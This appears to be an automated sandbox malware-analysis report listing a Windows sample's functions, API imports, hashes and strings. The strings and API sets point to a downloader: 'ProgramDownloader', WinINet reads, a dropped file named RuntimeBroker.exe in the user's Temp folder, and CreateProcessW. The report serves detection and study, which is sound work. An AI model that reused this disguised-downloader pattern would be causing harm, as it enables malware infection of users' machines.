Function_00007FF6517933F4 19->23 25 Function_00007FF651793CE8 19->25 19->32 38 Function_00007FF651794010 19->38 43 Function_00007FF651794008 19->43 19->48 53 Function_00007FF651794034 19->53 66 Function_00007FF651794050 19->66 79 Function_00007FF65179385C 19->79 86 Function_00007FF65179406C 19->86 19->94 97 Function_00007FF651793E88 19->97 102 Function_00007FF6517935A4 19->102 20 Function_00007FF651791DF0 20->45 103 Function_00007FF651792AB0 20->103 21 Function_00007FF6517911F0 22 Function_00007FF651793CF0 23->22 23->32 26 Function_00007FF651791F00 27 Function_00007FF651791A00 27->1 28 Function_00007FF651791000 28->0 28->7 28->63 85 Function_00007FF651793568 28->85 29 Function_00007FF651792400 30 Function_00007FF651791300 31 Function_00007FF651794400 35 Function_00007FF651793CFC 32->35 33 Function_00007FF651793EF8 34 Function_00007FF6517937FC 34->96 36 Function_00007FF6517939FC 36->17 37 Function_00007FF651794410 39 Function_00007FF651791D10 39->45 39->103 40 Function_00007FF651791C10 40->45 41 Function_00007FF651791210 42 Function_00007FF651793511 44 Function_00007FF65179441E 69 Function_00007FF651793860 45->69 84 Function_00007FF651793968 45->84 46 Function_00007FF651792120 46->7 46->45 81 Function_00007FF651792F70 46->81 47 Function_00007FF651792720 49 Function_00007FF651794024 50->22 52 Function_00007FF651791330 52->30 53->49 56 Function_00007FF65179402C 53->56 54 Function_00007FF651794228 54->13 55 Function_00007FF65179442A 57 Function_00007FF651791940 57->98 58->36 58->59 59->41 60 Function_00007FF651794540 60->7 61 Function_00007FF651791140 62 Function_00007FF651792740 63->7 63->15 63->58 63->59 63->98 64 Function_00007FF651794442 65->48 67 Function_00007FF651793848 78 Function_00007FF651793F5C 67->78 70 Function_00007FF651794460 70->7 71 Function_00007FF651794360 72->27 74 Function_00007FF651792E60 72->74 73->45 73->74 74->12 74->45 74->52 75 Function_00007FF651792560 75->45 76 Function_00007FF651792760 76->98 81->7 81->15 81->58 81->59 82 Function_00007FF651792470 83 Function_00007FF651792A70 83->7 83->57 87 Function_00007FF65179436C 88 Function_00007FF651791080 88->63 88->85 89 Function_00007FF651791180 91 Function_00007FF651794380 92->22 93 Function_00007FF651791390 95 Function_00007FF651794390 98->103 99 Function_00007FF6517911A0 99->7 100 Function_00007FF6517912A0 101 Function_00007FF6517943A0 102->85 103->45 104 Function_00007FF6517943B0 105 Function_00007FF6517932B4 106 Function_00007FF6517940A8 107 Function_00007FF6517941AC 107->13 108 Function_00007FF6517945AC 108->7

                                                    Executed Functions

                                                    Function 00007FF6517916C0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 144networkfileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Internet$CloseD@std@@@std@@HandleU?$char_traits@$FileOpenRead$??1?$basic_ios@??1?$basic_ostream@??1?$basic_streambuf@?setstate@?$basic_ios@?write@?$basic_ostream@V12@
                                                    • String ID: ProgramDownloader
                                                    • API String ID: 3000614519-2978029317
                                                    • Opcode ID: 9b4171f253dd89bc2f4e8e56ac116c2dcbdf496e5238893e0a2f42cba29b3923
                                                    • Instruction ID: 9a711ab5f920926c81d9e349171a4eb28d96c3f0fed7f43442c8a7cd882dc988
                                                    • Opcode Fuzzy Hash: 9b4171f253dd89bc2f4e8e56ac116c2dcbdf496e5238893e0a2f42cba29b3923
                                                    • Instruction Fuzzy Hash: 74716372B18B5686EB10CF29E4A47A977B0FB85B54F884032DA4D93B69DF3CD549CB00
                                                    Function 00007FF6517913C0 Relevance: 9.2, APIs: 6, Instructions: 197COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 114 7ff6517913c0-7ff65179141d GetUserNameW 115 7ff65179141f 114->115 116 7ff651791426-7ff651791445 call 7ff651792840 114->116 115->116 119 7ff6517916b2-7ff6517916b7 call 7ff6517912e0 116->119 120 7ff65179144b-7ff651791489 116->120 122 7ff65179148f-7ff651791499 120->122 123 7ff651791523-7ff651791563 memmove 120->123 125 7ff6517914e1-7ff6517914fe 122->125 126 7ff65179149b-7ff6517914a8 122->126 127 7ff651791565 123->127 128 7ff651791569-7ff651791581 123->128 132 7ff651791504-7ff651791507 125->132 133 7ff6517916ac-7ff6517916b1 call 7ff651791240 125->133 129 7ff6517914ac-7ff6517914b3 126->129 127->128 130 7ff651791583-7ff6517915ba memmove 128->130 131 7ff6517915bc-7ff6517915ce call 7ff6517930e0 128->131 134 7ff6517914b5-7ff6517914bc 129->134 135 7ff65179150d-7ff651791512 call 7ff651793340 129->135 136 7ff6517915d0-7ff651791604 130->136 131->136 132->129 139 7ff651791509-7ff65179150b 132->139 133->119 134->133 142 7ff6517914c2-7ff6517914cd call 7ff651793340 134->142 154 7ff651791515-7ff65179151a 135->154 144 7ff651791641-7ff651791645 136->144 145 7ff651791606-7ff65179161d 136->145 140 7ff65179151e 139->140 140->123 159 7ff651791634-7ff65179163a _invalid_parameter_noinfo_noreturn 142->159 164 7ff6517914d3-7ff6517914df 142->164 148 7ff65179167f-7ff6517916ab call 7ff651793320 144->148 149 7ff651791647-7ff651791659 144->149 151 7ff65179161f-7ff651791632 145->151 152 7ff65179163b-7ff651791640 call 7ff6517935bc 145->152 155 7ff651791677-7ff65179167a call 7ff6517935bc 149->155 156 7ff65179165b-7ff65179166e 149->156 151->152 151->159 152->144 154->140 155->148 156->155 161 7ff651791670-7ff651791676 _invalid_parameter_noinfo_noreturn 156->161 159->152 161->155 164->154
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturnmemmove$Concurrency::cancel_current_taskNameUsermalloc
                                                    • String ID:
                                                    • API String ID: 2791147819-0
                                                    • Opcode ID: e0a027a790e6d81c1cc841c0ede4b6693aa2e5a3c244eea9489b0198a93938e3
                                                    • Instruction ID: 4abbe1952fe60823f0fc13400309384847af0406a70d20cf11b61f774b780575
                                                    • Opcode Fuzzy Hash: e0a027a790e6d81c1cc841c0ede4b6693aa2e5a3c244eea9489b0198a93938e3
                                                    • Instruction Fuzzy Hash: 7B81B562F18B4191EB10DB29E4542AD6360FB58BB4F584332EA6D937DADF7CE198C340
                                                    Function 00007FF651792C60 Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF651792C9D
                                                    • ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF651792CBC
                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF651792CEE
                                                    • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF651792D09
                                                    • ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH@Z.MSVCP140 ref: 00007FF651792D33
                                                    • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF651792D50
                                                    • _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF651792D77
                                                    • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF651792DC2
                                                      • Part of subcall function 00007FF651792E60: ??0_Lockit@std@@QEAA@H@Z.MSVCP140 ref: 00007FF651792E8D
                                                      • Part of subcall function 00007FF651792E60: ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF651792EA7
                                                      • Part of subcall function 00007FF651792E60: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140 ref: 00007FF651792ED9
                                                      • Part of subcall function 00007FF651792E60: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140 ref: 00007FF651792F04
                                                      • Part of subcall function 00007FF651792E60: std::_Facet_Register.LIBCPMT ref: 00007FF651792F1D
                                                      • Part of subcall function 00007FF651792E60: ??1_Lockit@std@@QEAA@XZ.MSVCP140 ref: 00007FF651792F3C
                                                    • ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF651792DD7
                                                    • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF651792DEE
                                                    • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF651792E2D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: U?$char_traits@$D@std@@@std@@$Init@?$basic_streambuf@$Lockit@std@@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@?setstate@?$basic_ios@Bid@locale@std@@D@std@@@1@_Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU_iobuf@@V42@@V?$basic_streambuf@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_
                                                    • String ID:
                                                    • API String ID: 3067465659-0
                                                    • Opcode ID: 70ab79a1403d5315265d0810cb3557e94bf044a389665fcccea069b5cdcf3fa9
                                                    • Instruction ID: 943866e440d2007710e818e395da53d9bae5632b5dae80e36c91cb47c0052940
                                                    • Opcode Fuzzy Hash: 70ab79a1403d5315265d0810cb3557e94bf044a389665fcccea069b5cdcf3fa9
                                                    • Instruction Fuzzy Hash: 4A516B3260AF8586EB50CF29E86436977A4FB49F88F584036DA8E93729DF3CD459C740
                                                    Function 00007FF651791A00 Relevance: 13.6, APIs: 9, Instructions: 81processCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle$Process$AttributesCodeCreateExitFileOpenSleep
                                                    • String ID:
                                                    • API String ID: 2606710791-0
                                                    • Opcode ID: 4465e095109e34562a7ab258df4e49aaeb65685f479cd2585f2238bd64d95dd3
                                                    • Instruction ID: 4f708015a7bd906ab3cf1baa006d86e2f184253588b53872471cec224a7a4ce4
                                                    • Opcode Fuzzy Hash: 4465e095109e34562a7ab258df4e49aaeb65685f479cd2585f2238bd64d95dd3
                                                    • Instruction Fuzzy Hash: 93415222E1DB428AF710CB68E86027973A1FF48754F484235D94DB2AAEDF3CE569C640
                                                    Function 00007FF6517936D4 Relevance: 10.6, APIs: 7, Instructions: 94COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: __scrt_acquire_startup_lock__scrt_get_show_window_mode__scrt_release_startup_lock_cexit_exit_get_narrow_winmain_command_line_register_thread_local_exe_atexit_callback
                                                    • String ID:
                                                    • API String ID: 3995423050-0
                                                    • Opcode ID: fa25cb70bbc0ac460ecf776212904400aa92264d06165a6d857d54fd50dba9c8
                                                    • Instruction ID: 0602ff6b2cc212e1616db905ce674fa40a85672913816e42f7590d7a0cab8857
                                                    • Opcode Fuzzy Hash: fa25cb70bbc0ac460ecf776212904400aa92264d06165a6d857d54fd50dba9c8
                                                    • Instruction Fuzzy Hash: 8D314C64E4C24391FB24AB7D9571BB92291EF55B84F4C4035E60EEB2EFDE2CE80C8211
                                                    Function 00007FF651791000 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00007FF651792840: memmove.VCRUNTIME140(?,?,?,00007FF651791015), ref: 00007FF6517928AA
                                                      • Part of subcall function 00007FF6517913C0: GetUserNameW.ADVAPI32 ref: 00007FF65179140C
                                                      • Part of subcall function 00007FF6517913C0: memmove.VCRUNTIME140 ref: 00007FF65179154D
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF651791061
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: memmove$NameUser_invalid_parameter_noinfo_noreturn
                                                    • String ID: \AppData\Local\Temp\RuntimeBroker.exe
                                                    • API String ID: 3654858880-2057000481
                                                    • Opcode ID: 79f19905d00526ba3ce40e61f548f22a8b056df1b5f43dc48df9402481aa5e6c
                                                    • Instruction ID: 89a0196e0e12454362d3040df51cdf855764ec264ac277c49cea22e7669482cd
                                                    • Opcode Fuzzy Hash: 79f19905d00526ba3ce40e61f548f22a8b056df1b5f43dc48df9402481aa5e6c
                                                    • Instruction Fuzzy Hash: F9F081A1F19A86A1EF10DB2CE46127D1221AF843F4F841332E16DA26EF9E2CD54CC300
                                                    Function 00007FF651791F00 Relevance: 3.1, APIs: 2, Instructions: 63fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: fwritememmove
                                                    • String ID:
                                                    • API String ID: 1388854176-0
                                                    • Opcode ID: 1b73adc353df8ee469e39ce0e44924bb4f7f18ed2af78d11447982f98b68e384
                                                    • Instruction ID: 9c44e996cc6bd8b476229edb1b43ae8399b5efe0d8d46356aaf197c6d201e2b6
                                                    • Opcode Fuzzy Hash: 1b73adc353df8ee469e39ce0e44924bb4f7f18ed2af78d11447982f98b68e384
                                                    • Instruction Fuzzy Hash: 1F112922B05B4586EB148F9E95202786360FB94FD4F6C0036EF0CA774ADF3DE4A68300
                                                    Function 00007FF651791B60 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00007FF651791A00: OpenProcess.KERNEL32 ref: 00007FF651791A53
                                                      • Part of subcall function 00007FF651791A00: GetExitCodeProcess.KERNELBASE ref: 00007FF651791A68
                                                      • Part of subcall function 00007FF651791A00: CloseHandle.KERNEL32 ref: 00007FF651791A75
                                                      • Part of subcall function 00007FF651791A00: CloseHandle.KERNEL32 ref: 00007FF651791A8F
                                                      • Part of subcall function 00007FF651791A00: GetFileAttributesW.KERNELBASE ref: 00007FF651791AA8
                                                      • Part of subcall function 00007FF651791A00: CreateProcessW.KERNELBASE ref: 00007FF651791B25
                                                      • Part of subcall function 00007FF651791A00: CloseHandle.KERNEL32 ref: 00007FF651791B3C
                                                      • Part of subcall function 00007FF651791A00: CloseHandle.KERNEL32 ref: 00007FF651791B46
                                                      • Part of subcall function 00007FF651791A00: SleepEx.KERNELBASE ref: 00007FF651791B51
                                                      • Part of subcall function 00007FF651792E60: ??0_Lockit@std@@QEAA@H@Z.MSVCP140 ref: 00007FF651792E8D
                                                      • Part of subcall function 00007FF651792E60: ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF651792EA7
                                                      • Part of subcall function 00007FF651792E60: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140 ref: 00007FF651792ED9
                                                      • Part of subcall function 00007FF651792E60: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140 ref: 00007FF651792F04
                                                      • Part of subcall function 00007FF651792E60: std::_Facet_Register.LIBCPMT ref: 00007FF651792F1D
                                                      • Part of subcall function 00007FF651792E60: ??1_Lockit@std@@QEAA@XZ.MSVCP140 ref: 00007FF651792F3C
                                                    • ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF651791B8B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle$Process$Lockit@std@@$??0_??1_?always_noconv@codecvt_base@std@@AttributesBid@locale@std@@CodeCreateExitFacet_FileGetcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@OpenRegisterSleepV42@@Vfacet@locale@2@std::_
                                                    • String ID:
                                                    • API String ID: 1212312986-0
                                                    • Opcode ID: 4a88758a9339877e77c4009f11d0d5f0dae864ccd5e63a23c5d9fc6f2f06fa28
                                                    • Instruction ID: 35da4f201f36778f8e3d9e2ccfdfb9ec1329a98a645722e2188075b3a2e5643d
                                                    • Opcode Fuzzy Hash: 4a88758a9339877e77c4009f11d0d5f0dae864ccd5e63a23c5d9fc6f2f06fa28
                                                    • Instruction Fuzzy Hash: 52E06521E1994181EB04AB5AF5A537963A0EF48BC4F5C4031DA4D57B4FDE3CC4A4C744

                                                    Non-executed Functions

                                                    Function 00007FF651793D04 Relevance: 13.6, APIs: 9, Instructions: 71COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 313767242-0
                                                    • Opcode ID: 1a83481ad1522f8b885902559ffce35783f61588aaa64065adf0bca0ce3e5ff8
                                                    • Instruction ID: 7fcd9c42dc57094f4da4e9709411012e15f40c25c6543b6bface2f6be86bc3f3
                                                    • Opcode Fuzzy Hash: 1a83481ad1522f8b885902559ffce35783f61588aaa64065adf0bca0ce3e5ff8
                                                    • Instruction Fuzzy Hash: 16315E76609B8186EB608F69E8607ED7360FB84744F48403ADA4E97B99DF3CD54CC710
                                                    Function 00007FF651793F5C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                    • String ID:
                                                    • API String ID: 2933794660-0
                                                    • Opcode ID: 5cb9591401710e660a825713dcc64f818a20f48456534f9fba00a5c7d4122e34
                                                    • Instruction ID: 19cc7922a78d14c0783c3f76b8ad6c19e1b92b5e932b3fc799b56b37cf522d55
                                                    • Opcode Fuzzy Hash: 5cb9591401710e660a825713dcc64f818a20f48456534f9fba00a5c7d4122e34
                                                    • Instruction Fuzzy Hash: 71113322B14F0589EB00CF78E8652B833A4FB19758F480D31DA6DD6759DF7CD1688340
                                                    Function 00007FF651793EE8 Relevance: .0, Instructions: 2COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ba47d34bbe3b7e9c4939e468852733ce2b193c4c4515983354e78054b495e4d2
                                                    • Instruction ID: bbf76487ba0a3b81785ca1a2020b121ab6fea55803bc3dd03fa423a8fa47c9cd
                                                    • Opcode Fuzzy Hash: ba47d34bbe3b7e9c4939e468852733ce2b193c4c4515983354e78054b495e4d2
                                                    • Instruction Fuzzy Hash: 0AA0022290CC57E0E7048B2DE9734302330EF54700B9D0032C41DE186A9FBCE88DC340
                                                    Function 00007FF651792120 Relevance: 10.7, APIs: 7, Instructions: 177COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 208 7ff651792120-7ff651792155 209 7ff651792183-7ff65179218b 208->209 210 7ff651792157-7ff651792165 208->210 212 7ff651792197-7ff6517921a2 209->212 213 7ff65179218d-7ff651792192 209->213 210->209 211 7ff651792167-7ff65179217e 210->211 214 7ff6517923cf-7ff6517923f3 call 7ff651793320 211->214 215 7ff6517921c4-7ff6517921d0 212->215 216 7ff6517921a4-7ff6517921c2 212->216 213->214 218 7ff6517921ee-7ff651792215 fgetc 215->218 219 7ff6517921d2-7ff6517921e0 fgetc 215->219 216->215 223 7ff651792320 218->223 224 7ff65179221b 218->224 221 7ff6517921e6-7ff6517921e9 219->221 222 7ff6517923cd 219->222 221->222 222->214 225 7ff651792325-7ff65179232d 223->225 226 7ff651792220-7ff65179222b 224->226 225->222 227 7ff651792333-7ff651792344 225->227 228 7ff65179224d-7ff651792255 call 7ff651792f70 226->228 229 7ff65179222d-7ff65179224b 226->229 230 7ff6517923c8 call 7ff6517935bc 227->230 231 7ff65179234a-7ff65179235d 227->231 232 7ff65179225a-7ff6517922ac ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z 228->232 229->232 230->222 231->230 237 7ff65179235f-7ff651792365 _invalid_parameter_noinfo_noreturn 231->237 235 7ff6517922ae-7ff6517922b1 232->235 236 7ff6517922b7-7ff6517922c7 232->236 235->236 238 7ff651792366-7ff651792369 235->238 239 7ff65179237e-7ff651792395 236->239 240 7ff6517922cd-7ff65179231a memmove fgetc 236->240 237->238 238->223 241 7ff65179236b-7ff65179237c 238->241 242 7ff6517923bf-7ff6517923c3 239->242 243 7ff651792397 239->243 240->223 240->226 241->225 242->225 244 7ff6517923a0-7ff6517923b7 ungetc 243->244 244->242 245 7ff6517923b9-7ff6517923bd 244->245 245->244
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: fgetc
                                                    • String ID:
                                                    • API String ID: 2807381905-0
